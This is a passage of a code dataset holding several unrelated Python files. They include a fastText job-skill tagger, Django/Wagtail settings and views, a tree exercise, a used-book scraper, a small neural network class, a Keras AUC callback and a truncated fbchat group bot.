Vector) -> float:\n \"\"\"\n Returns the cosine of the angle between the two vectors.\n Results range from -1 (very different) to 1 (very similar).\n \"\"\"\n return dot_product(v1, v2) / (vector_len(v1) * vector_len(v2))\n \n\ndef setup():\n\tprint(\"Loading job descriptions... \")\n\n\tglobal df\n\t# fill empty cells to prevent raised exception\n\tdf.description.fillna('', inplace=True)\n\n\t# remove html from description column\n\tdf.description = df.description.apply(lambda x: get_words(x))\n\tdf.description = df.description.apply(lambda x: bytes(x, 'utf-8').decode('utf-8', 'ignore')) \n\tdf.description = df.description.apply(lambda x: re.sub(r'[^A-Za-z0-9+]+', ' ', x)) \n\n\tdf.requirements.fillna('', inplace=True)\n\n\t# remove html from requirements column\n\tdf.requirements = df.requirements.apply(lambda x: get_words(x))\n\tdf.requirements = df.requirements.apply(lambda x: bytes(x, 'utf-8').decode('utf-8', 'ignore')) \n\tdf.requirements = df.requirements.apply(lambda x: re.sub(r'[^A-Za-z0-9+]+', ' ', x))\n\n\tprint(\"Job descriptions loaded.\")\n\n\n\ndef tech_deck():\n\n\t# load SpaCy pre-trained vector for entity extraction\n\tprint(\"Loading FastText model...\")\n\n\tmodel = fastText.load_model('new_output.bin') # load trained wiki/job model for later tagging\n\n\t\n\tfasttext_nn = FastTextNN(model) # pass fasttext model here for nearest neighbor implementation\n\n\tprint(\"FastText model loaded.\")\n\n\t# load stop words for cleaning purposes\n\tstop_words = set(stopwords.words('english'))\n\n\t# get list of current technologies\n\ttech_list = languages + technologies\n\n\t# CHANGE EXCEL OUTPUT FOR EACH MODE/SIZE\n\twith open('freeformjobs_skills.csv', 'w') as csvfile:\n\n\t\t# Initialize list for analysis of possible tags\n\t\tall_possible_tags = []\n\n\t\tfields = ['id', 'raw', 'tag_extracts', 'likely_tags', 'skill_extract']\n\t\twriter = csv.DictWriter(csvfile, fieldnames=fields)\n\t\twriter.writeheader()\n\n\t\tprint(\"Starting tagging...\")\n\n\t\tfor index, row in tqdm(df.iterrows(), total=df.shape[0]):\n\n\t\t\tcurrid = row['id']\n\n\t\t\tif len(row['requirements']) > 0:\n\t\t\t\trawtext = str(row['requirements'].encode('utf-8'))\n\t\t\telse:\n\t\t\t\trawtext = str(row['description'].encode('utf-8'))\n\n\t\t\toutput = []\n\t\t\tpossible_tags = []\n\n\t\t\t# only look at words that are initially capitalized\n\t\t\tmyList = rawtext.split()\n\t\t\tgoodList = []\n\t\t\tremovables = []\n\n\t\t\t# Remove stopwords\n\t\t\tfor word in myList:\n\t\t\t\tif word.lower() in 
stop_words:\n\t\t\t\t\tremovables.append(word)\n\n\t\t\tif 'san' in myList and 'francisco' in myList:\n\t\t\t\tremovables.append('san')\n\t\t\t\tremovables.append('francisco')\n\n\t\t\t[myList.remove(word) for word in removables]\n\n\t\t\t# Add any words with a capital letter to the potential list of tags\n\t\t\t[goodList.append(word) for word in myList if any(x.isupper() for x in word)]\n\n\t\t\t# Lower case every word\n\t\t\tgoodList = [x.lower() for x in goodList]\n\n\t\t\t# If any of the words are a direct match to our current tech list, add it as a tag\n\t\t\tfor item in goodList:\n\t\t\t\tresult = process.extractOne(item, tech_list)\n\t\t\t\tif ((result[1] >= 92) and (item not in output)):\n\t\t\t\t\toutput.append(item)\n\n\t\t\t[goodList.remove(word) for word in output]\n\n\t\t\t# Check for machine learning or AI\n\t\t\tif 'machine' in goodList and 'learning' in goodList:\n\t\t\t\toutput.append('machine learning')\n\t\t\t\tgoodList.remove('machine')\n\t\t\t\tgoodList.remove('learning')\n\t\t\telif 'artificial' in goodList and 'intelligence' in goodList:\n\t\t\t\toutput.append('AI')\n\t\t\t\tgoodList.remove('artificial')\n\t\t\t\tgoodList.remove('intelligence')\n\n\t\t\t# Analyze rest of words in FastText model\n\t\t\tfor item in goodList:\n\t\t\t\ttemp = fasttext_nn.nearest_words(item.lower())\n\t\t\t\tgood_matches = set([match[0] for match in temp if match[1] > .85])\n\t\t\t\tmyset = (good_matches) & (set(tech_list))\n\t\t\t\t# If word generates similar words that we do recognize, add it as a tag\n\t\t\t\tif (len(myset) > 0) and (item not in output) and (item not in possible_tags):\n\t\t\t\t\tpossible_tags.append(item)\n\t\t\t\t\tall_possible_tags.append(item)\n\n\n\t\t\t# Add skill/specialty tags based on languages/technologies used\n\t\t\tskillList = []\n\t\t\tfor tech in output:\n\t\t\t\tmax_score = 0\n\t\t\t\tskill_match = ''\n\t\t\t\tfor skill in skills:\n\t\t\t\t\tv1 = model.get_word_vector(tech)\n\t\t\t\t\tv2 = model.get_word_vector(skill)\n\t\t\t\t\tresult = cosine_similarity(v1, v2)\n\t\t\t\t\tif result > max_score:\n\t\t\t\t\t\tmax_score = result\n\t\t\t\t\t\tskill_match = skill\n\t\t\t\tskillList.append(skill_match)\n\n\t\t\tskillSet = Counter(skillList)\n\n\t\t\t# default to an empty list so the row below can always be written;\n\t\t\t# previously bestSkill was unbound (or stale) when no skill matched\n\t\t\tbestSkill = []\n\t\t\tif len(skillSet) > 0:\n\t\t\t\tbestSkill = skillSet.most_common()\n\n\t\t\t# final step: write the output row to the csv file\n\t\t\twriter.writerow({'id': currid, 'raw': rawtext, 'tag_extracts': output, 'likely_tags' : possible_tags, 'skill_extract': bestSkill})\n\n\t\t\tdel output[:]\n\n\t\tprint(\"Tagging done!\")\n\n\t\thigh_frequency_tags = Counter(all_possible_tags)\n\t\tprint('High Frequency Possible Tags: ')\n\t\tprint(high_frequency_tags.most_common()[:10])\n\n\n\n# used this model from fastText's github to implement better nearest neighbor function\nclass FastTextNN:\n \n def __init__(self, ft_model, ft_matrix=None):\n self.ft_model = ft_model \n self.ft_words = ft_model.get_words()\n self.word_frequencies = dict(zip(*ft_model.get_words(include_freq=True)))\n self.ft_matrix = ft_matrix\n if self.ft_matrix is None:\n self.ft_matrix = np.empty((len(self.ft_words), ft_model.get_dimension()))\n for i, word in enumerate(self.ft_words):\n self.ft_matrix[i,:] = ft_model.get_word_vector(word)\n \n def find_nearest_neighbor(self, query, vectors, n=10, cossims=None):\n \"\"\"\n query is a 1d numpy array corresponding to the vector to which you want to\n find the closest vector\n vectors is a 2d numpy array corresponding to the vectors you want to consider\n\n cossims is a 1d numpy array of size len(vectors), which can be 
passed for efficiency\n returns the index of the closest n matches to query within vectors and the cosine similarity (cosine of the angle between the vectors)\n\n \"\"\"\n if cossims is None:\n cossims = np.matmul(vectors, query, out=cossims)\n\n norms = np.sqrt((query**2).sum() * (vectors**2).sum(axis=1))\n cossims = cossims/norms\n result_i = np.argpartition(-cossims, range(n+1))[1:n+1]\n return list(zip(result_i, cossims[result_i]))\n\n def nearest_words(self, word, n=10, word_freq=None):\n result = self.find_nearest_neighbor(self.ft_model.get_word_vector(word), self.ft_matrix, n=n)\n if word_freq:\n return [(self.ft_words[r[0]], round(r[1], 2)) for r in result if self.word_frequencies[self.ft_words[r[0]]] >= word_freq]\n else:\n return [(self.ft_words[r[0]], round(r[1], 2)) for r in result]\n\n\n\nif __name__ == '__main__':\n\tsetup()\n\ttech_deck()\n\n\t","sub_path":"TagGenerator/job_tag_executable.py","file_name":"job_tag_executable.py","file_ext":"py","file_size_in_byte":15104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"222794987","text":"\"\"\"\nDjango settings for project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\nimport os\nfrom os.path import abspath, basename, dirname, join, normpath\nfrom sys import path\n\n# Absolute filesystem path to the Django project directory:\nDJANGO_ROOT = dirname(dirname(dirname(abspath(__file__))))\n\n# Absolute filesystem path to the top-level project folder:\nPROJECT_ROOT = dirname(DJANGO_ROOT)\n\n# Site name:\nSITE_NAME = basename(DJANGO_ROOT)\n\nWAGTAIL_SITE_NAME = \"Made with Wagtail\"\n\n# Search results template\nWAGTAILSEARCH_RESULTS_TEMPLATE = 'core/search_results.html'\n\n# Add our project to our pythonpath, this way we don't need to type our project\n# name in our dotted import paths:\npath.append(DJANGO_ROOT)\n\n\"\"\"\nTwo things are wrong with Django's default `SECRET_KEY` system:\n\n1. It is not random but pseudo-random\n2. It saves and displays the SECRET_KEY in `settings.py`\n\nThis snippet\n1. uses `SystemRandom()` instead to generate a random key\n2. saves a local `secret.txt`\n\nThe result is a random and safely hidden `SECRET_KEY`.\n\"\"\"\ntry:\n SECRET_KEY\nexcept NameError:\n SECRET_FILE = os.path.join(PROJECT_ROOT, 'secret.txt')\n try:\n SECRET_KEY = open(SECRET_FILE).read().strip()\n except IOError:\n try:\n import random\n SECRET_KEY = ''.join(\n [random.SystemRandom().choice('abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)') for i in range(50)]\n )\n # the Python 2 'file()' builtin does not exist in Python 3; use open()\n secret = open(SECRET_FILE, 'w')\n secret.write(SECRET_KEY)\n secret.close()\n except IOError:\n raise Exception('Please create a %s file with random characters to generate your secret key!' 
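# (illustrative comment, assuming the definitions above) SECRET_FILE points at PROJECT_ROOT/secret.txt, so the message names the exact path to create\n                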
% SECRET_FILE)\n\n# Hosts/domain names that are valid for this site; required if DEBUG is False\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'compressor',\n 'taggit',\n 'modelcluster',\n 'captcha',\n 'wagtailcaptcha',\n 'core',\n 'overextends',\n 'api',\n 'wagtailgmaps',\n 'rest_framework',\n 'wagtail.contrib.wagtailsitemaps',\n 'wagtail.contrib.wagtailroutablepage',\n 'wagtail.wagtailcore',\n 'wagtail.wagtailadmin',\n 'wagtail.wagtaildocs',\n 'wagtail.wagtailsnippets',\n 'wagtail.wagtailusers',\n 'wagtail.wagtailsites',\n 'wagtail.wagtailimages',\n 'wagtail.wagtailembeds',\n 'wagtail.wagtailsearch',\n 'wagtail.wagtailredirects',\n 'wagtail.wagtailforms',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n\n 'wagtail.wagtailcore.middleware.SiteMiddleware',\n\n 'wagtail.wagtailredirects.middleware.RedirectMiddleware',\n)\n\n# Name and email addresses of recipients\nADMINS = (\n ('Tech-urgent', 'tech-urgent@springload.co.nz'),\n)\n\n# Default from address for CMS auto email messages (logs, errors..)\nSERVER_EMAIL = 'errors@madewithwagtail.org'\n\n# Default from address for CMS email messages to users (forgot password etc..)\nDEFAULT_FROM_EMAIL = '%s@madewithwagtail.org' % SITE_NAME\n\nROOT_URLCONF = SITE_NAME + '.urls'\nWSGI_APPLICATION = SITE_NAME + '.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'madewithwagtail',\n 'USER': 'postgres',\n 'HOST': '', # Set to empty string for localhost.\n 'PORT': '', # Set to empty string for default.\n 'CONN_MAX_AGE': 600, # number of seconds database connections should persist for\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-gb'\nTIME_ZONE = 'Pacific/Auckland'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nDATE_FORMAT = 'j F Y'\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_ROOT = join(PROJECT_ROOT, 'static')\nSTATIC_URL = '/static/'\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n)\n\nSTATICFILES_DIRS = (\n join(DJANGO_ROOT, 'static'),\n)\n\nMEDIA_ROOT = join(PROJECT_ROOT, 'media')\nMEDIA_URL = '/media/'\n\n# Django compressor settings\n# http://django-compressor.readthedocs.org/en/latest/settings/\n\nCOMPRESS_PRECOMPILERS = (\n ('text/x-scss', 'django_libsass.SassCompiler'),\n)\n\n# Template configuration\nCONTEXT_PROCESSORS = [\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.request',\n 'core.context_processors.baseurl',\n 'core.context_processors.google_analytics',\n 'core.context_processors.api_companies_endpoint',\n 'django.contrib.messages.context_processors.messages',\n]\n\n# Wagtail settings\n\nLOGIN_URL = 
'wagtailadmin_login'\nLOGIN_REDIRECT_URL = 'wagtailadmin_home'\n\n# Wagtailgmaps settings\n\nWAGTAIL_ADDRESS_MAP_CENTER = 'Wellington, New Zealand'\nWAGTAIL_ADDRESS_MAP_ZOOM = 8\n\n# List of web hook URLs we push Slack messages to on page publish.\n# URLs should stay secret - define them in local.py\nPUBLISH_SLACK_HOOKS = []\n\nTAGGIT_CASE_INSENSITIVE = True\n\n# REST framework\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAuthenticatedOrReadOnly',),\n 'PAGINATE_BY': None,\n}\n","sub_path":"madewithwagtail/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"107052963","text":"from GeeksForGeeks.Tree.BinaryTree import BinaryTree\n\n\"\"\"\nRemove all nodes which don’t lie in any path with sum>= k\n\nGiven a binary tree, a complete path is defined as a path from root to a leaf.\n The sum of all nodes on that path is defined as the sum of that path. Given a number K,\n you have to remove (prune the tree) all nodes which don’t lie in any path with sum>=k.\n\nNote: A node can be part of multiple paths. So we have to delete it only in case when all paths from\nit have sum less than K.\n\nConsider the following Binary Tree\n 1\n / \\\n 2 3\n / \\ / \\\n 4 5 6 7\n / \\ / /\n8 9 12 10\n / \\ \\\n 13 14 11\n /\n 15\n\nFor input k = 20, the tree should be changed to following\n(Nodes with values 6 and 8 are deleted)\n 1\n / \\\n 2 3\n / \\ \\\n 4 5 7\n \\ / /\n 9 12 10\n / \\ \\\n 13 14 11\n /\n 15\n\nFor input k = 45, the tree should be changed to following.\n 1\n /\n 2\n /\n 4\n \\\n 9\n \\\n 14\n /\n 15\n\"\"\"\n\ndef remove_nodes(node,_sum):\n if not node :\n return\n else :\n node.left = remove_nodes(node.left, _sum - node.data)\n node.right = remove_nodes(node.right, _sum - node.data)\n\n if not node.left and not node.right :\n if node.data < _sum :\n node = None\n return node\n\nif __name__ =='__main__':\n bt = BinaryTree()\n for i in range(1,20):\n bt.add_node(i)\n remove_nodes(bt.root,25)\n bt.print_levelorder()\n\n\n\n\n","sub_path":"GeeksForGeeks/Tree/RemoveNodesWithSumK.py","file_name":"RemoveNodesWithSumK.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"391707722","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .forms import UserRegistration\n\ndef register(request):\n\n\tif request.method == 'POST':\n\t\tform = UserRegistration(request.POST)\n\t\t\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\tusername = form.cleaned_data.get('username')\n\t\t\tmessages.success(request, f'Account created for {username}!')\n\t\t\treturn redirect('login')\n\telse :\n\t\tform = UserRegistration()\n\n\n\tcontext = {\n\t\t'title': 'Register'\n\t}\n\treturn render(request, 'users/register.html', {'form': form})\n\n# CHANGED TO DJANGO.CONTRIB.AUTH.AUTH_VIEWS\ndef login(request):\n\tcontext = {\n\t\t'title': 'Login'\n\t}\n\tform = UserRegistration()\n\treturn render(request, 'users/login.html', {'form': form})\n\n\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"47618554","text":"import sympy\nimport curtis\n\n\nclass CurtisG2(curtis.Curtis):\n # variables for the torus\n v = []\n # \"primed\" variables\n vv = []\n # \"double primed\" 
variables\"\n vvv = []\n\n def __init__(self, t):\n super().__init__(t)\n cmd = self.group.var.com_variables_l(\"v\", [\"a0\", \"b0\", \"c0\", \"d0\"])\n exec(cmd[0])\n exec(cmd[1])\n\n v = self.v\n self.tori = [\n [[\"t\", 0, v[0]], [\"t\", 1, v[1]]],\n [[\"t\", 1, v[2]]],\n [],\n [[\"t\", 0, v[3]]]\n ]\n\n cmd = self.group.var.com_variables_l(\"vv\", [\"a1\", \"b1\", \"c1\", \"d1\"])\n exec(cmd[0])\n exec(cmd[1])\n\n vv = self.vv\n self.tori2 = [\n [[\"t\", 0, vv[0]], [\"t\", 1, vv[1]]],\n [[\"t\", 1, vv[2]]],\n [],\n [[\"t\", 0, vv[3]]]\n ]\n\n cmd = self.group.var.com_variables_l(\"vvv\", [\"a2\", \"b2\", \"c2\", \"d2\"])\n exec(cmd[0])\n exec(cmd[1])\n\n vvv = self.vvv\n self.tori3 = [\n [[\"t\", 0, vvv[0]], [\"t\", 1, vvv[1]]],\n [[\"t\", 1, vvv[2]]],\n [],\n [[\"t\", 0, vvv[3]]]\n ]\n","sub_path":"curtisg2.py","file_name":"curtisg2.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"477532111","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.listings, name='listings'),\n path('<int:listing_id>', views.listing, name='listing'),\n path('search', views.search, name='search'),\n path('contact', views.contact, name='contact'),\n\n path('add', views.ListingCreate.as_view(), name='listing-add'),\n path('<int:pk>/update', views.ListingUpdate.as_view(), name='listing-update'),\n path('<int:pk>/delete', views.ListingDelete.as_view(), name='listing-delete'),\n]","sub_path":"listings/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"573858913","text":"from urllib.request import urlopen\r\nfrom urllib import parse\r\nfrom bs4 import BeautifulSoup\r\n#from selenium import webdriver\r\nimport time\r\nimport os\r\n\r\n\r\nclass CatchDogUsedBooks():\r\n baseDomain=\"\"\r\n baseUrl={\"ALADIN-USEDOFFLINE\":\"http://m.aladin.co.kr/m/msearch.aspx?SearchTarget=UsedStore&SearchWord={keyword}\",\r\n \"ALADIN-USEDONLINE\":\"http://m.aladin.co.kr/m/msearch.aspx?SearchTarget=Used&SearchWord={keyword}\"}\r\n dtRlt=dict()\r\n def __init__(self):\r\n #self.d=webdriver.PhantomJS()\r\n pass\r\n \r\n def gogogo(self,kword,target):\r\n self.baseDomain=self.baseUrl[target][:self.baseUrl[target].index('kr')+2]\r\n url=self.baseUrl[target].format(keyword=parse.quote(kword))\r\n #create the result dict before the try block so the return below never hits an unbound name\r\n dtBook=dict()\r\n try:\r\n html=urlopen(url)\r\n bs=BeautifulSoup(html,'html.parser')\r\n #tables=bs.find('div',{'id':'Search3_Result'})\r\n boxs=bs.findAll('div',{'class':'browse_list_box'})\r\n dtBStore=dict()\r\n ltBattr=list()\r\n for bx in boxs:\r\n dtBStore.clear()\r\n ltBattr.clear()\r\n \r\n trs=bx.findAll('tr')\r\n ltBattr.append(trs[0].find('span',{'class':'b_book_t'}).getText())\r\n ltBattr.append(trs[0].findAll('li')[1].getText())\r\n #lis=trs[0].findAll('li')\r\n #for li in lis:\r\n # bAttr.append(li.getText())\r\n\r\n #ttl=trs[0].find('ul').getText()\r\n ttl=' | '.join(ltBattr)\r\n if len(trs)>1:\r\n ass=trs[1].find_all('a')\r\n for a in ass:\r\n dtBStore[a.getText()]=self.baseDomain+'/'+a['href']\r\n\r\n dtBook[ttl]=dtBStore.copy()\r\n \r\n \r\n except Exception as e:\r\n print(\"Error ...\",str(e))\r\n pass\r\n \r\n return dtBook\r\n \r\n\r\n def printResult(self,dtB):\r\n for a in dtB.keys():\r\n print(\"[%s] >>> %s\" %(a,','.join(list(dtB[a].keys()))))\r\n\r\n return\r\n \r\nif __name__=='__main__':\r\n fpath=os.path.join(\"D:\\\\SOURCE\",\"gitSync\",\"Python\",\"input.txt\")\r\n kwords=[]\r\n #with open(fpath,'r') as f:\r\n # kwords=f.readlines()\r\n # f.close()\r\n print(\"input search keyword\")\r\n t=input()\r\n kwords.append(t)\r\n 
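# Illustrative alternative (hypothetical usage, not exercised below): baseUrl also\r\n    # defines an 'ALADIN-USEDONLINE' target, so c.gogogo(k, 'ALADIN-USEDONLINE') would\r\n    # search Aladin's online used inventory instead of the offline stores.\r\n    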
c=CatchDogUsedBooks()\n for k in kwords:\n dt=c.gogogo(k,'ALADIN-USEDOFFLINE')\n c.printResult(dt)\n \n print(\"finished...\")\n print(\"Please any key press for exit\")\n input()\n","sub_path":"CatchDogUsedBooks_input.py","file_name":"CatchDogUsedBooks_input.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"138579675","text":"low_score_number = int(input())\ncurrent_problem_name = str()\nlast_problem_name = 'none'\nscore = int()\ntotal_score = 0\ntest_number = 0\nlow_score_count = 0\nwhile low_score_count < low_score_number:\n last_problem_name = current_problem_name\n current_problem_name = str(input())\n if current_problem_name == 'Enough':\n average_score = total_score / test_number\n print(f'Average score: {average_score:.2f}')\n print(f'Number of problems: {test_number}')\n print(f'Last problem: {last_problem_name}')\n break\n test_number += 1\n grade = int(input())\n total_score += grade\n if grade <= 4:\n low_score_count += 1\n if low_score_count == low_score_number:\n print(f'You need a break, {low_score_count} poor grades.')\n","sub_path":"1_pb_python/pb_python_whle_loop_exercice/exam_preparation.py","file_name":"exam_preparation.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"253893472","text":"import random\nimport time\nimport numpy as np\n\nclass Neuralnet:\n def __init__(self, layers=None, neuralnet=None, parents=None, mutate_prob=None, path=None):\n self.layers = list()\n self.neurons = list()\n self.weights = list()\n random.seed(time.time())\n\n if layers is not None and neuralnet is None and parents is None and path is None:\n #list with amount of neurons as each index\n self.layers = layers\n #list with lists(layers) which contain value of neurons\n self.init_neurons()\n #list with lists(layers) with list with neurons weights for each neuron\n self.init_weights()\n\n self.layers = np.asarray(self.layers)\n self.neurons = np.asarray(self.neurons)\n self.weights = np.asarray(self.weights)\n elif neuralnet is not None and layers is None and parents is None and path is None:\n self.layers = Neuralnet.layers()\n self.neurons = Neuralnet.neurons()\n self.weights = Neuralnet.weights()\n elif parents is not None and layers is None and neuralnet is None and path is None:\n if mutate_prob is None:\n self.evolve(parents, 1000)\n elif mutate_prob is not None:\n self.evolve(parents, mutate_prob)\n elif path is not None and layers is None and neuralnet is None and parents is None:\n self.read_net(path)\n self.layers = np.asarray(self.layers)\n self.neurons = np.asarray(self.neurons)\n self.weights = np.asarray(self.weights)\n else:\n print(\"Error: Check input\")\n\n def init_neurons(self):\n for i in self.layers:\n #adds list with neurons to each layer\n self.neurons.append([x for x in range(i)])\n\n def init_weights(self):\n #goes through each layer, but not the input layer\n for i in range(1,len(self.layers)):\n neurons_in_previous_layer = self.layers[i - 1]\n layersweights = list()\n #goes through each neuron in current layer\n for j in self.neurons[i]:\n weightlist = list()\n #goes through each previous neuron, because thats the amount of weights the current neuron needs\n for k in range(neurons_in_previous_layer):\n #add random weight to weightlist of current neuron\n weightlist.append(random.random() - 0.5)\n layersweights.append(weightlist)\n self.weights.append(layersweights)\n 
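# Illustrative forward pass (a sketch; the topology and input values are made up):\n    #   net = Neuralnet(layers=[2, 3, 1])      # 2 inputs, 3 hidden, 1 output\n    #   out = net.feed_forward([0.5, -0.2])    # -> list with the single output value\n    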
\n def feed_forward(self, inputs, bias=0):\n #put input in first input layer\n self.neurons[0] = inputs\n #go through each layer, but not the input layer\n for i in range(1,len(self.layers)):\n #go through each neuron\n for j in range(len(self.neurons[i])):\n value = bias #start the weighted sum from the bias term\n #go through each previous neuron\n for k in range(len(self.neurons[i - 1])):\n #multiply each weight with corresponding previous neuron and sum all of them\n value += self.weights[i-1][j][k] * self.neurons[i - 1][k]\n #makes the neuron the current value and applies an activation function on it\n self.neurons[i][j] = np.tanh(value) \n #return list of output neurons\n return self.neurons[len(self.neurons) - 1]\n\n #parents = list of 2 nn\n def evolve(self, parents, mutate_prob):\n self.layers = parents[0].layers\n self.neurons = parents[0].neurons\n self.init_weights()\n\n for i in range(len(parents[0].weights)):\n for j in range(len(parents[0].weights[i])):\n for k in range(len(parents[0].weights[i][j])):\n rv = random.randrange(0,2)\n if rv == 0:\n self.weights[i][j][k] = parents[0].weights[i][j][k]\n elif rv == 1:\n self.weights[i][j][k] = parents[1].weights[i][j][k]\n\n self.mutate(mutate_prob)\n\n def mutate(self, chance):\n rv1 = random.randrange(0,chance)\n #i = layers, j = neurons, k = each weight for neuron\n for i in range(len(self.weights)):\n for j in range(len(self.weights[i])):\n for k in range(len(self.weights[i][j])):\n rv2 = random.randrange(0,chance)\n if rv1 == rv2:\n self.weights[i][j][k] += (random.random() - 0.5)\n elif rv1 + rv2 == chance:\n self.weights[i][j][k] *= -1\n\n def print_net(self):\n print(\"layers: \", self.layers)\n print(\"neurons: \", self.neurons)\n print(\"weights: \", self.weights)\n\n #Writes the amount of neurons in each layer, then the weights of each layer\n #Individual values are separated by '/'; layer data and weight data are divided by '.'\n def save_net(self, path):\n file = open(path, mode='w', encoding='utf-8', newline='')\n for i in self.layers:\n file.write(str(i))\n file.write('/')\n file.write('.')\n for i in range(len(self.weights)):\n for j in range(len(self.weights[i])):\n for k in range(len(self.weights[i][j])):\n file.write(str(self.weights[i][j][k]))\n file.write('/')\n file.close()\n\n def read_net(self, path):\n file = open(path, mode='r', encoding='utf-8', newline='')\n f_data = file.read()\n file.close()\n\n #layer data and weight data are divided by the first '.' (layer sizes contain no dots)\n layer_data, weight_data = f_data.split('.', 1)\n\n #Read amount of neurons for each layer (layer data)\n self.layers = [int(n) for n in layer_data.split('/') if n]\n self.init_neurons()\n\n #Read the weights back in the same nested order save_net wrote them:\n #for every layer, one weight per (neuron, previous neuron) pair\n flat_weights = [float(w) for w in weight_data.split('/') if w]\n self.weights = []\n index = 0\n for i in range(1, len(self.layers)):\n layer_weights = []\n for j in range(self.layers[i]):\n layer_weights.append(flat_weights[index:index + self.layers[i - 1]])\n index += self.layers[i - 1]\n self.weights.append(layer_weights)\n\n\n'''\nNeurons: [\n [1,2,3] -> layer1 (input) with 3 neurons\n [1,2,3,4] -> layer2 with 4 neurons\n [1,2] -> layer3 (output) with 2 neurons\n ]\nItems in first list are the layers, items in second list are the neurons\n\nWeights: [\n [ [1,2,3], [1,2,3], [1,2,3], [1,2,3] ] -> layer2 with 4 neurons -> 1,2,3 represent neurons connection with each input (or previous neuron)\n [ [1,2,3,4], [1,2,3,4] ] -> layer3 (output) with 2 neurons -> 1,2,3,4 represent neurons connection with each input\n ]\nItems in first list are the layers, items in second list are the neurons and items in third list are the connections between that neuron and all previous neurons aka the connection each neuron has\n'''","sub_path":"Neuralnet.py","file_name":"Neuralnet.py","file_ext":"py","file_size_in_byte":7205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"238710758","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 24 12:11:18 2018\n\n@author: weikaiqi\n\"\"\"\n\nfrom keras.callbacks import Callback\nfrom sklearn.metrics import roc_auc_score\n\n# Note: you can't calculate ROC&AUC by mini-batches, you can only calculate it on the end of one epoch\nclass RocAucEvaluation(Callback):\n def __init__(self, training_data=(), validation_data=(), interval=1):\n super(RocAucEvaluation, self).__init__()\n\n self.interval = interval\n self.X , self.y = training_data\n self.X_val, self.y_val = validation_data\n\n def on_epoch_end(self, epoch, logs={}):\n if epoch % self.interval == 0:\n y_pred = self.model.predict(self.X, verbose=0)\n score = roc_auc_score(self.y, y_pred)\n \n y_pred_val = self.model.predict(self.X_val, verbose=0)\n score_val = roc_auc_score(self.y_val, y_pred_val)\n \n print(\"\\n ROC-AUC - epoch: {:d} - train score: {:.6f} - val score: {:.6f}\".format(epoch, score, score_val))\n\n","sub_path":"pylib/KerasAUC.py","file_name":"KerasAUC.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"387228256","text":"import time\r\n\r\nfrom fbchat import log, Client\r\nfrom fbchat.models import *\r\n\r\n\r\nclass PakerBot(Client):\r\n    # a class may only define onMessage once; later definitions silently replace\r\n    # earlier ones, so every text trigger is handled in this single method\r\n    def onMessage(self, author_id, message_object, thread_id, thread_type, **kwargs):\r\n\r\n        if message_object.text == \"!reputacja\" and thread_type == ThreadType.GROUP and thread_id == \"2458017120955707\":\r\n            self.send(Message(text=\"Nasi bohaterowie:\\nKrzysztof 9999pkt rep\\nRobert 666 pkt rep\\nKrzysztof 40 pkt rep\\nBronisław 15 pkt rep\"), thread_id=\"2458017120955707\", thread_type=ThreadType.GROUP)\r\n\r\n        # Imiona\r\n        elif message_object.text in (\"rovert\", \"rupert\", \"roland\", \"rower\") and thread_type == ThreadType.GROUP and thread_id == \"2458017120955707\":\r\n            self.send(Message(text=\"Dla Ciebie 